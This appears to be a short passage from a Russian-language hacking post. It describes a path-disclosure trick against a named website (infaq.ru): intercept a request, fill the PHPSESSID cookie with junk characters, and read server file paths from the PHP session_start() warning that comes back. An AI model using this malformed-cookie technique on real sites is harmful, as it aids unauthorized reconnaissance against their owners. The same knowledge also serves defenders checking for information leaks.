1) Раскрытие путей.
Перехватываем пакет и записываем в параметр PHPSESSID что-то вроде !"№;%:?*(). Отправляем запрос. Получаем
Код:
...
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/y...103/.../infaq.ru/public_html/system/start.php:3) in /home/y...103/.../infaq.ru/public_html/.../start.php on line 3
...